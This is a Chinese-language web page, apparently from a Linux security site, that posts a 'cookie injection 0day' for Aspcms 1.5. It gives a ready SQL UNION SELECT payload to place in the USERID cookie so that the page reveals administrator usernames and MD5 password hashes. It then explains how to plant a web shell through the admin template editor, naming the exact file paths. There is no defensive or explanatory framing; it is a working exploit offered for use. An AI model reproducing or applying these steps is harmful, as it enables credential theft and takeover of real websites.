Linux安全网 - Linux操作系统_Linux 命令_Linux教程_Linux黑客

绿色网站无广告
会员投稿 投稿指南 本期推荐:
搜索:
您的位置: Linux安全网 > Linux安全 > » 正文

Aspcms 1.5 COOKIES注入0day

来源: 未知 分享至:

Aspcms 1.5 COOKIES注入0day,注册一个帐号。然后登陆后修改COOKIES的USERID值

在后面加上注入语句:

UNION SELECT 1,2,3,4,5,6,username,adminpassword,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from Aspcms_admins

然后编辑帐号就能看到管理员的帐号和MD5密码值。

后台拿SHELL:

访问admin/_Style/AspCms_TemplateEdit.asp?filename=tmdsb.asp在里面加一句话或者大马。

保存后SHELL在风格目录下面。Templates/default/html/tmdsb.asp


Tags:
分享至:
最新图文资讯
1 2 3 4 5 6
验证码:点击我更换图片 理智评论文明上网,拒绝恶意谩骂 用户名:
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史